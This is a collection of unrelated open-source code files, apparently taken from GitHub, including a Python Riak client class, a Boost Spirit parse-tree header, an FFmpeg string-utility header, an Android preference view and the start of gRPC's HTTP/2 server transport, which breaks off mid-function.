:meth:`multiput` operations. Defaults to a factor of the number of
CPUs in the system
:type multiput_pool_size: int
"""
kwargs = kwargs.copy()
if nodes is None:
self.nodes = [self._create_node(kwargs), ]
else:
self.nodes = [self._create_node(n) for n in nodes]
self._multiget_pool_size = multiget_pool_size
self._multiput_pool_size = multiput_pool_size
self.protocol = protocol or 'pbc'
self._resolver = None
self._credentials = self._create_credentials(credentials)
self._http_pool = HttpPool(self, **transport_options)
self._tcp_pool = TcpPool(self, **transport_options)
self._closed = False
if PY2:
self._encoders = {'application/json': default_encoder,
'text/json': default_encoder,
'text/plain': str}
self._decoders = {'application/json': json.loads,
'text/json': json.loads,
'text/plain': str}
else:
self._encoders = {'application/json': binary_json_encoder,
'text/json': binary_json_encoder,
'text/plain': str_to_bytes,
'binary/octet-stream': binary_encoder_decoder}
self._decoders = {'application/json': binary_json_decoder,
'text/json': binary_json_decoder,
'text/plain': bytes_to_str,
'binary/octet-stream': binary_encoder_decoder}
self._buckets = WeakValueDictionary()
self._bucket_types = WeakValueDictionary()
self._tables = WeakValueDictionary()
def __del__(self):
self.close()
def _get_protocol(self):
return self._protocol
def _set_protocol(self, value):
if value not in self.PROTOCOLS:
raise ValueError("protocol option is invalid, must be one of %s" %
repr(self.PROTOCOLS))
self._protocol = value
protocol = property(_get_protocol, _set_protocol,
doc="""
Which protocol to prefer, one of
:attr:`PROTOCOLS
<riak.client.RiakClient.PROTOCOLS>`. Please
note that when one protocol is selected, the
other protocols MAY NOT attempt to connect.
Changing to another protocol will cause a
connection on the next request.
Some requests are only valid over ``'http'``,
and will always be sent via
those transports, regardless of which protocol
is preferred.
""")
def _get_resolver(self):
return self._resolver or default_resolver
def _set_resolver(self, value):
if value is None or callable(value):
self._resolver = value
else:
raise TypeError("resolver is not a function")
resolver = property(_get_resolver, _set_resolver,
doc=""" The sibling-resolution function for this client.
Defaults to :func:`riak.resolver.default_resolver`.""")
def _get_client_id(self):
with self._transport() as transport:
return transport.client_id
def _set_client_id(self, client_id):
for http in self._http_pool:
http.client_id = client_id
for pb in self._tcp_pool:
pb.client_id = client_id
client_id = property(_get_client_id, _set_client_id,
doc="""The client ID for this client instance""")
def get_encoder(self, content_type):
"""
Get the encoding function for the provided content type.
:param content_type: the requested media type
:type content_type: str
:rtype: function
"""
return self._encoders.get(content_type)
def set_encoder(self, content_type, encoder):
"""
Set the encoding function for the provided content type.
:param content_type: the requested media type
:type content_type: str
:param encoder: an encoding function, takes a single object
argument and returns encoded data
:type encoder: function
"""
self._encoders[content_type] = encoder
def get_decoder(self, content_type):
"""
Get the decoding function for the provided content type.
:param content_type: the requested media type
:type content_type: str
:rtype: function
"""
return self._decoders.get(content_type)
def set_decoder(self, content_type, decoder):
"""
Set the decoding function for the provided content type.
:param content_type: the requested media type
:type content_type: str
:param decoder: a decoding function, takes encoded data and
returns a Python type
:type decoder: function
"""
self._decoders[content_type] = decoder
def bucket(self, name, bucket_type='default'):
"""
Get the bucket by the specified name. Since buckets always exist,
this will always return a
:class:`RiakBucket <riak.bucket.RiakBucket>`.
If you are using a bucket that is contained in a bucket type, it is
preferable to access it from the bucket type object::
# Preferred:
client.bucket_type("foo").bucket("bar")
# Equivalent, but not preferred:
client.bucket("bar", bucket_type="foo")
:param name: the bucket name
:type name: str
:param bucket_type: the parent bucket-type
:type bucket_type: :class:`BucketType <riak.bucket.BucketType>`
or str
:rtype: :class:`RiakBucket <riak.bucket.RiakBucket>`
"""
if not isinstance(name, string_types):
raise TypeError('Bucket name must be a string')
if isinstance(bucket_type, string_types):
bucket_type = self.bucket_type(bucket_type)
elif not isinstance(bucket_type, BucketType):
raise TypeError('bucket_type must be a string '
'or riak.bucket.BucketType')
b = RiakBucket(self, name, bucket_type)
return self._setdefault_handle_none(
self._buckets, (bucket_type, name), b)
def bucket_type(self, name):
"""
Gets the bucket-type by the specified name. Bucket-types do
not always exist (unlike buckets), but this will always return
a :class:`BucketType <riak.bucket.BucketType>` object.
:param name: the bucket-type name
:type name: str
:rtype: :class:`BucketType <riak.bucket.BucketType>`
"""
if not isinstance(name, string_types):
raise TypeError('BucketType name must be a string')
btype = BucketType(self, name)
return self._setdefault_handle_none(
self._bucket_types, name, btype)
def table(self, name):
"""
Gets the table by the specified name. Tables do
not always exist (unlike buckets), but this will always return
a :class:`Table <riak.table.Table>` object.
:param name: the table name
:type name: str
:rtype: :class:`Table <riak.table.Table>`
"""
if not isinstance(name, string_types):
raise TypeError('Table name must be a string')
if name in self._tables:
return self._tables[name]
else:
table = Table(self, name)
self._tables[name] = table
return table
def close(self):
"""
Iterate through all of the connections and close each one.
"""
if not self._closed:
self._closed = True
self._stop_multi_pools()
if self._http_pool is not None:
self._http_pool.clear()
self._http_pool = None
if self._tcp_pool is not None:
self._tcp_pool.clear()
self._tcp_pool = None
def _stop_multi_pools(self):
if self._multiget_pool:
self._multiget_pool.stop()
self._multiget_pool = None
if self._multiput_pool:
self._multiput_pool.stop()
self._multiput_pool = None
def _create_node(self, n):
if isinstance(n, RiakNode):
return n
elif isinstance(n, tuple) and len(n) is 3:
host, http_port, pb_port = n
return RiakNode(host=host,
http_port=http_port,
pb_port=pb_port)
elif isinstance(n, dict):
return RiakNode(**n)
else:
raise TypeError("%s is not a valid node configuration"
% repr(n))
def _create_credentials(self, n):
"""
Create security credentials, if necessary.
"""
if not n:
return n
elif isinstance(n, SecurityCreds):
return n
elif isinstance(n, dict):
return SecurityCreds(**n)
else:
raise TypeError("%s is not a valid security configuration"
% repr(n))
def _choose_node(self, nodes=None):
"""
Chooses a random node from the list of nodes in the client,
taking into account each node's recent error rate.
:rtype RiakNode
"""
if not nodes:
nodes = self.nodes
# Prefer nodes which have gone a reasonable time without
# errors
def _error_rate(node):
return node.error_rate.value()
good = [n for n in nodes if _error_rate(n) < 0.1]
if len(good) is 0:
# Fall back to a minimally broken node
return min(nodes, key=_error_rate)
else:
return random.choice(good)
def _setdefault_handle_none(self, wvdict, key, value):
# TODO FIXME FUTURE
# This is a workaround for Python issue 19542
# http://bugs.python.org/issue19542
rv = wvdict.setdefault(key, value)
if rv is None:
return value
else:
return rv
@lazy_property
def _multiget_pool(self):
if self._multiget_pool_size:
return MultiGetPool(self._multiget_pool_size)
else:
return None
@lazy_property
def _multiput_pool(self):
if self._multiput_pool_size:
return MultiPutPool(self._multiput_pool_size)
else:
return None
def __hash__(self):
return hash(frozenset([(n.host, n.http_port, n.pb_port)
for n in self.nodes]))
def __eq__(self, other):
if isinstance(other, self.__class__):
return hash(self) == hash(other)
else:
return False
def __ne__(self, other):
if isinstance(other, self.__class__):
return hash(self) != hash(other)
else:
return True
| {
"pile_set_name": "Github"
} |
//
// Jumbotron
// --------------------------------------------------
.jumbotron {
padding: @jumbotron-padding;
margin-bottom: @jumbotron-padding;
font-size: @jumbotron-font-size;
font-weight: 200;
line-height: (@line-height-base * 1.5);
color: @jumbotron-color;
background-color: @jumbotron-bg;
h1,
.h1 {
line-height: 1;
color: @jumbotron-heading-color;
}
p {
line-height: 1.4;
}
.container & {
border-radius: @border-radius-large; // Only round corners at higher resolutions if contained in a container
}
.container {
max-width: 100%;
}
@media screen and (min-width: @screen-sm-min) {
padding-top: (@jumbotron-padding * 1.6);
padding-bottom: (@jumbotron-padding * 1.6);
.container & {
padding-left: (@jumbotron-padding * 2);
padding-right: (@jumbotron-padding * 2);
}
h1,
.h1 {
font-size: (@font-size-base * 4.5);
}
}
}
| {
"pile_set_name": "Github"
} |
#include "b.h"
class foo {
int x, y;
public:
foo(){};
~foo(){};
};
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2013, the Dart project authors. Please see the AUTHORS file
// for details. All rights reserved. Use of this source code is governed by a
// BSD-style license that can be found in the LICENSE file.
/// Simple command line interface to launching browsers.
/// Uses the browser_controller framework.
/// The usage is:
/// DARTBIN launch_browser.dart BROWSER_NAME URL
/// DARTBIN should be the checked in stable binary.
import 'package:test_runner/src/browser_controller.dart';
import 'package:test_runner/src/configuration.dart';
void printHelp() {
print("Usage pattern:");
print("launch_browser.dart browser url");
print("Supported browsers: ${Browser.supportedBrowsers}");
}
void main(List<String> arguments) {
if (arguments.length != 2) {
print("Wrong number of arguments, please pass in exactly two arguments");
printHelp();
return;
}
var name = arguments[0];
if (!Browser.supportedBrowser(name)) {
print("Specified browser not supported");
printHelp();
return;
}
var runtime = Runtime.find(name);
var configuration = TestConfiguration(
configuration: Configuration(
"dummy configuration", null, null, null, runtime, null));
var executable = configuration.browserLocation;
var browser = Browser.byRuntime(runtime, executable);
browser.start(arguments[1]);
}
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2003 Daniel Nuffer
Copyright (c) 2001-2007 Hartmut Kaiser
http://spirit.sourceforge.net/
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#ifndef BOOST_SPIRIT_TREE_PARSE_TREE_HPP
#define BOOST_SPIRIT_TREE_PARSE_TREE_HPP
#include <boost/spirit/home/classic/namespace.hpp>
#include <boost/spirit/home/classic/tree/common.hpp>
#include <boost/spirit/home/classic/core/scanner/scanner.hpp>
#include <boost/spirit/home/classic/tree/parse_tree_fwd.hpp>
///////////////////////////////////////////////////////////////////////////////
namespace boost { namespace spirit {
BOOST_SPIRIT_CLASSIC_NAMESPACE_BEGIN
//////////////////////////////////
// pt_match_policy is simply an id so the correct specialization of tree_policy can be found.
template <
typename IteratorT,
typename NodeFactoryT,
typename T
>
struct pt_match_policy :
public common_tree_match_policy<
pt_match_policy<IteratorT, NodeFactoryT, T>,
IteratorT,
NodeFactoryT,
pt_tree_policy<
pt_match_policy<IteratorT, NodeFactoryT, T>,
NodeFactoryT,
T
>,
T
>
{
typedef
common_tree_match_policy<
pt_match_policy<IteratorT, NodeFactoryT, T>,
IteratorT,
NodeFactoryT,
pt_tree_policy<
pt_match_policy<IteratorT, NodeFactoryT, T>,
NodeFactoryT,
T
>,
T
>
common_tree_match_policy_;
pt_match_policy()
{
}
template <typename PolicyT>
pt_match_policy(PolicyT const & policies)
: common_tree_match_policy_(policies)
{
}
};
//////////////////////////////////
template <typename MatchPolicyT, typename NodeFactoryT, typename T>
struct pt_tree_policy :
public common_tree_tree_policy<MatchPolicyT, NodeFactoryT>
{
typedef typename MatchPolicyT::match_t match_t;
typedef typename MatchPolicyT::iterator_t iterator_t;
template<typename MatchAT, typename MatchBT>
static void concat(MatchAT& a, MatchBT const& b)
{
BOOST_SPIRIT_ASSERT(a && b);
std::copy(b.trees.begin(), b.trees.end(),
std::back_insert_iterator<typename match_t::container_t>(a.trees));
}
template <typename MatchT, typename Iterator1T, typename Iterator2T>
static void group_match(MatchT& m, parser_id const& id,
Iterator1T const& first, Iterator2T const& last)
{
if (!m)
return;
typedef typename NodeFactoryT::template factory<iterator_t> factory_t;
typedef typename tree_match<iterator_t, NodeFactoryT, T>::container_t
container_t;
typedef typename container_t::iterator cont_iterator_t;
match_t newmatch(m.length(),
factory_t::create_node(first, last, false));
std::swap(newmatch.trees.begin()->children, m.trees);
// set this node and all it's unset children's rule_id
newmatch.trees.begin()->value.id(id);
for (cont_iterator_t i = newmatch.trees.begin()->children.begin();
i != newmatch.trees.begin()->children.end();
++i)
{
if (i->value.id() == 0)
i->value.id(id);
}
m = newmatch;
}
template <typename FunctorT, typename MatchT>
static void apply_op_to_match(FunctorT const& op, MatchT& m)
{
op(m);
}
};
namespace impl {
template <typename IteratorT, typename NodeFactoryT, typename T>
struct tree_policy_selector<pt_match_policy<IteratorT, NodeFactoryT, T> >
{
typedef pt_tree_policy<
pt_match_policy<IteratorT, NodeFactoryT, T>,
NodeFactoryT,
T
> type;
};
} // namespace impl
//////////////////////////////////
struct gen_pt_node_parser_gen;
template <typename T>
struct gen_pt_node_parser
: public unary<T, parser<gen_pt_node_parser<T> > >
{
typedef gen_pt_node_parser<T> self_t;
typedef gen_pt_node_parser_gen parser_generator_t;
typedef unary_parser_category parser_category_t;
gen_pt_node_parser(T const& a)
: unary<T, parser<gen_pt_node_parser<T> > >(a) {}
template <typename ScannerT>
typename parser_result<self_t, ScannerT>::type
parse(ScannerT const& scan) const
{
typedef typename ScannerT::iteration_policy_t iteration_policy_t;
typedef typename ScannerT::match_policy_t::iterator_t iterator_t;
typedef typename ScannerT::match_policy_t::factory_t factory_t;
typedef pt_match_policy<iterator_t, factory_t> match_policy_t;
typedef typename ScannerT::action_policy_t action_policy_t;
typedef scanner_policies<
iteration_policy_t,
match_policy_t,
action_policy_t
> policies_t;
return this->subject().parse(scan.change_policies(policies_t(scan)));
}
};
//////////////////////////////////
struct gen_pt_node_parser_gen
{
template <typename T>
struct result {
typedef gen_pt_node_parser<T> type;
};
template <typename T>
static gen_pt_node_parser<T>
generate(parser<T> const& s)
{
return gen_pt_node_parser<T>(s.derived());
}
template <typename T>
gen_pt_node_parser<T>
operator[](parser<T> const& s) const
{
return gen_pt_node_parser<T>(s.derived());
}
};
//////////////////////////////////
const gen_pt_node_parser_gen gen_pt_node_d = gen_pt_node_parser_gen();
///////////////////////////////////////////////////////////////////////////////
//
// Parse functions for parse trees
//
///////////////////////////////////////////////////////////////////////////////
template <
typename NodeFactoryT, typename IteratorT, typename ParserT,
typename SkipT
>
inline tree_parse_info<IteratorT, NodeFactoryT>
pt_parse(
IteratorT const& first_,
IteratorT const& last,
parser<ParserT> const& p,
SkipT const& skip,
NodeFactoryT const& /*dummy_*/ = NodeFactoryT())
{
typedef skip_parser_iteration_policy<SkipT> iter_policy_t;
typedef pt_match_policy<IteratorT, NodeFactoryT> pt_match_policy_t;
typedef
scanner_policies<iter_policy_t, pt_match_policy_t>
scanner_policies_t;
typedef scanner<IteratorT, scanner_policies_t> scanner_t;
iter_policy_t iter_policy(skip);
scanner_policies_t policies(iter_policy);
IteratorT first = first_;
scanner_t scan(first, last, policies);
tree_match<IteratorT, NodeFactoryT> hit = p.derived().parse(scan);
return tree_parse_info<IteratorT, NodeFactoryT>(
first, hit, hit && (first == last), hit.length(), hit.trees);
}
template <typename IteratorT, typename ParserT, typename SkipT>
inline tree_parse_info<IteratorT>
pt_parse(
IteratorT const& first,
IteratorT const& last,
parser<ParserT> const& p,
SkipT const& skip)
{
typedef node_val_data_factory<nil_t> default_node_factory_t;
return pt_parse(first, last, p, skip, default_node_factory_t());
}
//////////////////////////////////
template <typename IteratorT, typename ParserT>
inline tree_parse_info<IteratorT>
pt_parse(
IteratorT const& first_,
IteratorT const& last,
parser<ParserT> const& parser)
{
typedef pt_match_policy<IteratorT> pt_match_policy_t;
IteratorT first = first_;
scanner<
IteratorT,
scanner_policies<iteration_policy, pt_match_policy_t>
> scan(first, last);
tree_match<IteratorT> hit = parser.derived().parse(scan);
return tree_parse_info<IteratorT>(
first, hit, hit && (first == last), hit.length(), hit.trees);
}
//////////////////////////////////
template <typename CharT, typename ParserT, typename SkipT>
inline tree_parse_info<CharT const*>
pt_parse(
CharT const* str,
parser<ParserT> const& p,
SkipT const& skip)
{
CharT const* last = str;
while (*last)
last++;
return pt_parse(str, last, p, skip);
}
//////////////////////////////////
template <typename CharT, typename ParserT>
inline tree_parse_info<CharT const*>
pt_parse(
CharT const* str,
parser<ParserT> const& parser)
{
CharT const* last = str;
while (*last)
{
last++;
}
return pt_parse(str, last, parser);
}
///////////////////////////////////////////////////////////////////////////////
BOOST_SPIRIT_CLASSIC_NAMESPACE_END
}} // namespace BOOST_SPIRIT_CLASSIC_NS
#endif
| {
"pile_set_name": "Github"
} |
There are many different ways to style code with GitHub's markdown. If you have inline code blocks, wrap them in backticks: `var example = true`. If you've got a longer block of code, you can indent with four spaces:
if (isAwesome) {
return true
} | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
<color name="colorPrimary">#3F51B5</color>
<color name="colorPrimaryDark">#303F9F</color>
<color name="colorAccent">#FF4081</color>
</resources>
| {
"pile_set_name": "Github"
} |
using System.Configuration;
namespace Rhino.ServiceBus.Config
{
[ConfigurationCollection(typeof(AssemblyElement), CollectionType = ConfigurationElementCollectionType.BasicMap)]
public class AssemblyElementCollection : ConfigurationElementCollection
{
protected override ConfigurationElement CreateNewElement()
{
return new AssemblyElement();
}
protected override object GetElementKey(ConfigurationElement element)
{
var assemblyElement = (AssemblyElement)element;
return assemblyElement.Name;
}
public void Add(AssemblyElement assembly)
{
BaseAdd(assembly);
}
}
} | {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2014 MediaTek Inc.
* Author: James Liao <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#ifndef __DRV_CLK_GATE_H
#define __DRV_CLK_GATE_H
#include <linux/regmap.h>
#include <linux/clk-provider.h>
struct clk;
struct mtk_clk_gate {
struct clk_hw hw;
struct regmap *regmap;
int set_ofs;
int clr_ofs;
int sta_ofs;
u8 bit;
};
static inline struct mtk_clk_gate *to_mtk_clk_gate(struct clk_hw *hw)
{
return container_of(hw, struct mtk_clk_gate, hw);
}
extern const struct clk_ops mtk_clk_gate_ops_setclr;
extern const struct clk_ops mtk_clk_gate_ops_setclr_inv;
extern const struct clk_ops mtk_clk_gate_ops_no_setclr;
extern const struct clk_ops mtk_clk_gate_ops_no_setclr_inv;
struct clk *mtk_clk_register_gate(
const char *name,
const char *parent_name,
struct regmap *regmap,
int set_ofs,
int clr_ofs,
int sta_ofs,
u8 bit,
const struct clk_ops *ops);
#endif /* __DRV_CLK_GATE_H */
| {
"pile_set_name": "Github"
} |
<view class="container">
<view class="textContainer">
<text class="textStyle">{{text}}</text>
</view>
</view> | {
"pile_set_name": "Github"
} |
// #Conformance #TypesAndModules #Records
#light
// Verify the ability to clone records using a simplified syntax
type RecType = { A : int; B : string; C : float; D : RecType option }
let t1 = { A = 1; B = "t1"; C = 3.14; D = None }
let t2 = { t1 with A = 2 }
let t3 = { t2 with B = "t3" }
let t4 = { t3 with C = 4.4; D = Some(t1) }
// Changed field
if t1.A <> 1 || t2.A <> 2 then exit 1
// The rest were cloned from t1
if t1.B <> t2.B || t1.C <> t2.C || t1.D <> t2.D then exit 1
if t3.B <> "t3" then exit 1
// The rest were cloned from t2
if t3.A <> t2.A || t3.C <> t2.C || t3.D <> t2.D then exit 1
if t4.C <> 4.4 || t4.D <> Some(t1) then exit 1
if t4.A <> t3.A || t4.B <> t3.B then exit 1
exit 0
| {
"pile_set_name": "Github"
} |
''
'foo'
'foo\'bar'
``
`foo`
`foo\`bar`
----------------------------------------------------
[
["string", "''"],
["string", "'foo'"],
["string", "'foo\\'bar'"],
["string", "``"],
["string", "`foo`"],
["string", "`foo\\`bar`"]
]
----------------------------------------------------
Checks for strings. | {
"pile_set_name": "Github"
} |
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
with({}) { eval("{function f(){f}}") };
f()
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2007 Mans Rullgard
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#ifndef AVUTIL_AVSTRING_H
#define AVUTIL_AVSTRING_H
#include <stddef.h>
/**
* Return non-zero if pfx is a prefix of str. If it is, *ptr is set to
* the address of the first character in str after the prefix.
*
* @param str input string
* @param pfx prefix to test
* @param ptr updated if the prefix is matched inside str
* @return non-zero if the prefix matches, zero otherwise
*/
int av_strstart(const char *str, const char *pfx, const char **ptr);
/**
* Return non-zero if pfx is a prefix of str independent of case. If
* it is, *ptr is set to the address of the first character in str
* after the prefix.
*
* @param str input string
* @param pfx prefix to test
* @param ptr updated if the prefix is matched inside str
* @return non-zero if the prefix matches, zero otherwise
*/
int av_stristart(const char *str, const char *pfx, const char **ptr);
/**
* Locate the first case-independent occurrence in the string haystack
* of the string needle. A zero-length string needle is considered to
* match at the start of haystack.
*
* This function is a case-insensitive version of the standard strstr().
*
* @param haystack string to search in
* @param needle string to search for
* @return pointer to the located match within haystack
* or a null pointer if no match
*/
char *av_stristr(const char *haystack, const char *needle);
/**
* Copy the string src to dst, but no more than size - 1 bytes, and
* null-terminate dst.
*
* This function is the same as BSD strlcpy().
*
* @param dst destination buffer
* @param src source string
* @param size size of destination buffer
* @return the length of src
*
* WARNING: since the return value is the length of src, src absolutely
* _must_ be a properly 0-terminated string, otherwise this will read beyond
* the end of the buffer and possibly crash.
*/
size_t av_strlcpy(char *dst, const char *src, size_t size);
/**
* Append the string src to the string dst, but to a total length of
* no more than size - 1 bytes, and null-terminate dst.
*
* This function is similar to BSD strlcat(), but differs when
* size <= strlen(dst).
*
* @param dst destination buffer
* @param src source string
* @param size size of destination buffer
* @return the total length of src and dst
*
* WARNING: since the return value use the length of src and dst, these absolutely
* _must_ be a properly 0-terminated strings, otherwise this will read beyond
* the end of the buffer and possibly crash.
*/
size_t av_strlcat(char *dst, const char *src, size_t size);
/**
* Append output to a string, according to a format. Never write out of
* the destination buffer, and always put a terminating 0 within
* the buffer.
* @param dst destination buffer (string to which the output is
* appended)
* @param size total size of the destination buffer
* @param fmt printf-compatible format string, specifying how the
* following parameters are used
* @return the length of the string that would have been generated
* if enough space had been available
*/
size_t av_strlcatf(char *dst, size_t size, const char *fmt, ...);
/**
* Convert a number to a av_malloced string.
*/
char *av_d2str(double d);
#endif /* AVUTIL_AVSTRING_H */
| {
"pile_set_name": "Github"
} |
(** example.ml: The first special comment of the file is the comment
associated with the whole module. *)
(** Comment for exception My_exception. *)
exception My_exception of (int -> int) * int
(** Comment for type [weather] *)
type weather =
| Rain of int (** The comment for construtor Rain *)
| Sun (** The comment for constructor Sun *)
(** Find the current weather for a country
@author Anil Madhavapeddy
@param location The country to get the weather for.
*)
let what_is_the_weather_in location =
match location with
| `Cambridge -> Rain 100
| `New_york -> Rain 20
| `California -> Sun
| {
"pile_set_name": "Github"
} |
package com.fanchen.imovie.view.preference;
import android.content.Context;
import android.preference.Preference;
import android.util.AttributeSet;
import android.util.TypedValue;
import android.view.View;
import android.view.ViewGroup;
import android.widget.LinearLayout;
import com.fanchen.imovie.R;
import com.fanchen.imovie.util.DisplayUtil;
/**
* Created by fanchen on 2017/7/26.
*/
public class PreferenceLine extends Preference{
public PreferenceLine(Context context, AttributeSet attrs) {
super(context, attrs);
}
public PreferenceLine(Context context, AttributeSet attrs, int defStyleAttr) {
super(context, attrs, defStyleAttr);
}
public PreferenceLine(Context context) {
super(context);
}
@Override
protected View onCreateView(ViewGroup parent) {
super.onCreateView(parent);
LinearLayout linearLayout = new LinearLayout(getContext());
ViewGroup.LayoutParams layoutParams = new ViewGroup.LayoutParams(ViewGroup.LayoutParams.MATCH_PARENT,ViewGroup.LayoutParams.WRAP_CONTENT);
linearLayout.setLayoutParams(layoutParams);
View view = new View(parent.getContext());
TypedValue typedValue = new TypedValue();
getContext().getTheme().resolveAttribute(R.attr.colorPrimary, typedValue, true);
view.setBackgroundColor(typedValue.data);
LinearLayout.LayoutParams params = new LinearLayout.LayoutParams(ViewGroup.LayoutParams.MATCH_PARENT, DisplayUtil.dip2px(getContext(),0.5f));
int dp5 = DisplayUtil.dip2px(getContext(), 5);
int dp10 = DisplayUtil.dip2px(getContext(), 10);
params.topMargin = dp5;
params.leftMargin = dp10;
params.rightMargin = dp10;
view.setLayoutParams(params);
linearLayout.addView(view);
return linearLayout;
}
}
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright 2014 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package transport
import (
"bytes"
"context"
"errors"
"fmt"
"io"
"math"
"net"
"strconv"
"sync"
"sync/atomic"
"time"
"github.com/golang/protobuf/proto"
"golang.org/x/net/http2"
"golang.org/x/net/http2/hpack"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/credentials"
"google.golang.org/grpc/grpclog"
"google.golang.org/grpc/internal/channelz"
"google.golang.org/grpc/internal/grpcrand"
"google.golang.org/grpc/keepalive"
"google.golang.org/grpc/metadata"
"google.golang.org/grpc/peer"
"google.golang.org/grpc/stats"
"google.golang.org/grpc/status"
"google.golang.org/grpc/tap"
)
var (
// ErrIllegalHeaderWrite indicates that setting header is illegal because of
// the stream's state.
ErrIllegalHeaderWrite = errors.New("transport: the stream is done or WriteHeader was already called")
// ErrHeaderListSizeLimitViolation indicates that the header list size is larger
// than the limit set by peer.
ErrHeaderListSizeLimitViolation = errors.New("transport: trying to send header list size larger than the limit set by peer")
)
// http2Server implements the ServerTransport interface with HTTP2.
type http2Server struct {
ctx context.Context
ctxDone <-chan struct{} // Cache the context.Done() chan
cancel context.CancelFunc
conn net.Conn
loopy *loopyWriter
readerDone chan struct{} // sync point to enable testing.
writerDone chan struct{} // sync point to enable testing.
remoteAddr net.Addr
localAddr net.Addr
maxStreamID uint32 // max stream ID ever seen
authInfo credentials.AuthInfo // auth info about the connection
inTapHandle tap.ServerInHandle
framer *framer
// The max number of concurrent streams.
maxStreams uint32
// controlBuf delivers all the control related tasks (e.g., window
// updates, reset streams, and various settings) to the controller.
controlBuf *controlBuffer
fc *trInFlow
stats stats.Handler
// Flag to keep track of reading activity on transport.
// 1 is true and 0 is false.
activity uint32 // Accessed atomically.
// Keepalive and max-age parameters for the server.
kp keepalive.ServerParameters
// Keepalive enforcement policy.
kep keepalive.EnforcementPolicy
// The time instance last ping was received.
lastPingAt time.Time
// Number of times the client has violated keepalive ping policy so far.
pingStrikes uint8
// Flag to signify that number of ping strikes should be reset to 0.
// This is set whenever data or header frames are sent.
// 1 means yes.
resetPingStrikes uint32 // Accessed atomically.
initialWindowSize int32
bdpEst *bdpEstimator
maxSendHeaderListSize *uint32
mu sync.Mutex // guard the following
// drainChan is initialized when drain(...) is called the first time.
// After which the server writes out the first GoAway(with ID 2^31-1) frame.
// Then an independent goroutine will be launched to later send the second GoAway.
// During this time we don't want to write another first GoAway(with ID 2^31 -1) frame.
// Thus call to drain(...) will be a no-op if drainChan is already initialized since draining is
// already underway.
drainChan chan struct{}
state transportState
activeStreams map[uint32]*Stream
// idle is the time instant when the connection went idle.
// This is either the beginning of the connection or when the number of
// RPCs go down to 0.
// When the connection is busy, this value is set to 0.
idle time.Time
// Fields below are for channelz metric collection.
channelzID int64 // channelz unique identification number
czData *channelzData
}
// newHTTP2Server constructs a ServerTransport based on HTTP2. ConnectionError is
// returned if something goes wrong.
func newHTTP2Server(conn net.Conn, config *ServerConfig) (_ ServerTransport, err error) {
writeBufSize := config.WriteBufferSize
readBufSize := config.ReadBufferSize
maxHeaderListSize := defaultServerMaxHeaderListSize
if config.MaxHeaderListSize != nil {
maxHeaderListSize = *config.MaxHeaderListSize
}
framer := newFramer(conn, writeBufSize, readBufSize, maxHeaderListSize)
// Send initial settings as connection preface to client.
var isettings []http2.Setting
// TODO(zhaoq): Have a better way to signal "no limit" because 0 is
// permitted in the HTTP2 spec.
maxStreams := config.MaxStreams
if maxStreams == 0 {
maxStreams = math.MaxUint32
} else {
isettings = append(isettings, http2.Setting{
ID: http2.SettingMaxConcurrentStreams,
Val: maxStreams,
})
}
dynamicWindow := true
iwz := int32(initialWindowSize)
if config.InitialWindowSize >= defaultWindowSize {
iwz = config.InitialWindowSize
dynamicWindow = false
}
icwz := int32(initialWindowSize)
if config.InitialConnWindowSize >= defaultWindowSize {
icwz = config.InitialConnWindowSize
dynamicWindow = false
}
if iwz != defaultWindowSize {
isettings = append(isettings, http2.Setting{
ID: http2.SettingInitialWindowSize,
Val: uint32(iwz)})
}
if config.MaxHeaderListSize != nil {
isettings = append(isettings, http2.Setting{
ID: http2.SettingMaxHeaderListSize,
Val: *config.MaxHeaderListSize,
})
}
if err := framer.fr.WriteSettings(isettings...); err != nil {
return nil, connectionErrorf(false, err, "transport: %v", err)
}
// Adjust the connection flow control window if needed.
if delta := uint32(icwz - defaultWindowSize); delta > 0 {
if err := framer.fr.WriteWindowUpdate(0, delta); err != nil {
return nil, connectionErrorf(false, err, "transport: %v", err)
}
}
kp := config.KeepaliveParams
if kp.MaxConnectionIdle == 0 {
kp.MaxConnectionIdle = defaultMaxConnectionIdle
}
if kp.MaxConnectionAge == 0 {
kp.MaxConnectionAge = defaultMaxConnectionAge
}
// Add a jitter to MaxConnectionAge.
kp.MaxConnectionAge += getJitter(kp.MaxConnectionAge)
if kp.MaxConnectionAgeGrace == 0 {
kp.MaxConnectionAgeGrace = defaultMaxConnectionAgeGrace
}
if kp.Time == 0 {
kp.Time = defaultServerKeepaliveTime
}
if kp.Timeout == 0 {
kp.Timeout = defaultServerKeepaliveTimeout
}
kep := config.KeepalivePolicy
if kep.MinTime == 0 {
kep.MinTime = defaultKeepalivePolicyMinTime
}
